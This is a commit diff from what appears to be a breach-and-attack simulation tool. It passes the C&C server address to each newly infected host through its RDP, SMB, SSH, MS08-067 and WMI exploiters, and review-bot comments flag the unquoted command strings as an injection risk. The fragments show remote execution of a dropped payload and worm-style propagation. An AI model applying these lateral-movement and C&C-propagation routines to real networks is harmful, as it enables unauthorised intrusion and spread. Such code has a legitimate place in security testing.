GC-4600: monkey is propagating current C&C server
parent
fa4c92c7f1
commit
3522e6e02d
|
@ -255,9 +255,9 @@ class RdpExploiter(HostExploiter):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if self._config.rdp_use_vbs_download:
|
if self._config.rdp_use_vbs_download:
|
||||||
command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
|
command = RDP_CMDLINE_HTTP_VBS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
|
||||||
else:
|
else:
|
||||||
command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path' : http_path}
|
command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': self._config.dropper_target_path, 'http_path': http_path}
|
||||||
|
|
||||||
passwords = list(self._config.psexec_passwords[:])
|
passwords = list(self._config.psexec_passwords[:])
|
||||||
known_password = host.get_credentials(self._config.psexec_user)
|
known_password = host.get_credentials(self._config.psexec_user)
|
||||||
|
|
|
@ -105,6 +105,8 @@ class SmbExploiter(HostExploiter):
|
||||||
|
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
|
||||||
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
|
rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
|
||||||
|
|
|
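Review bot: `host.default_server` is appended to the command line unquoted and unvalidated in `cmdline += " -s " + host.default_server`, and the same two lines are repeated in the SSHExploiter, Ms08_067_Exploiter and WmiExploiter hunks. In the SSH hunk the string is passed to `ssh.exec_command(cmdline)` and in the MS08-067 hunk it is formatted into `"start %s\r\n"`, so a value containing whitespace or shell metacharacters would change the command that runs on the target rather than only the `-s` argument. Where the value is set is not visible here, so it may already be constrained upstream. I would move the `-t`/`-s` handling into one shared helper (say `build_monkey_cmdline_args(host)`, a suggested name) that rejects anything not matching the expected address form before appending, so the four exploiters cannot drift apart. The enclosing method starts and ends outside this hunk.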
@ -119,6 +119,8 @@ class SSHExploiter(HostExploiter):
|
||||||
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
|
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
cmdline += "&"
|
cmdline += "&"
|
||||||
ssh.exec_command(cmdline)
|
ssh.exec_command(cmdline)
|
||||||
|
|
|
@ -251,6 +251,8 @@ class Ms08_067_Exploiter(HostExploiter):
|
||||||
|
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
try:
|
try:
|
||||||
sock.send("start %s\r\n" % (cmdline, ))
|
sock.send("start %s\r\n" % (cmdline, ))
|
||||||
|
|
|
@ -86,6 +86,8 @@ class WmiExploiter(HostExploiter):
|
||||||
|
|
||||||
if host.default_tunnel:
|
if host.default_tunnel:
|
||||||
cmdline += " -t " + host.default_tunnel
|
cmdline += " -t " + host.default_tunnel
|
||||||
|
if host.default_server:
|
||||||
|
cmdline += " -s " + host.default_server
|
||||||
|
|
||||||
# execute the remote monkey
|
# execute the remote monkey
|
||||||
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
|
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(cmdline,
|
||||||
|
|
|
@ -9,6 +9,7 @@ class VictimHost(object):
|
||||||
self.services = {}
|
self.services = {}
|
||||||
self.monkey_exe = None
|
self.monkey_exe = None
|
||||||
self.default_tunnel = None
|
self.default_tunnel = None
|
||||||
|
self.default_server = None
|
||||||
|
|
||||||
def as_dict(self):
|
def as_dict(self):
|
||||||
return self.__dict__
|
return self.__dict__
|
||||||
|
@ -36,3 +37,6 @@ class VictimHost(object):
|
||||||
|
|
||||||
def get_credentials(self, username):
|
def get_credentials(self, username):
|
||||||
return self.cred.get(username.lower(), None)
|
return self.cred.get(username.lower(), None)
|
||||||
|
|
||||||
|
def set_default_server(self, default_server):
|
||||||
|
self.default_server = default_server
|
||||||
|
|
|
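Review bot: `set_default_server` stores its argument as given, with no docstring and no check on its form, and because `as_dict` returns `self.__dict__` the new `default_server` field will also appear wherever the host dict is serialised. If that dict is reported or logged (not visible here), the C&C address now travels with it, so please confirm that is intended. I would document the expected format on the setter, e.g. `"""Record the C&C server address (presumably host:port, to be confirmed) handed to the next monkey via -s."""`, and reject empty or malformed values there so the exploiters can rely on the field. The class body starts outside both hunks.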
@ -112,13 +112,10 @@ class HTTPConnectProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
# just provide a tunnel, transfer the data with no modification
|
# just provide a tunnel, transfer the data with no modification
|
||||||
req = self
|
req = self
|
||||||
reqbody = None
|
reqbody = None
|
||||||
import pdb
|
|
||||||
pdb.set_trace()
|
|
||||||
req.path = "https://%s/" % req.path.replace(':443', '')
|
req.path = "https://%s/" % req.path.replace(':443', '')
|
||||||
|
|
||||||
u = urlsplit(req.path)
|
u = urlsplit(req.path)
|
||||||
address = (u.hostname, u.port or 443)
|
address = (u.hostname, u.port or 443)
|
||||||
uri = u
|
|
||||||
try:
|
try:
|
||||||
conn = socket.create_connection(address)
|
conn = socket.create_connection(address)
|
||||||
except socket.error:
|
except socket.error:
|
||||||
|
|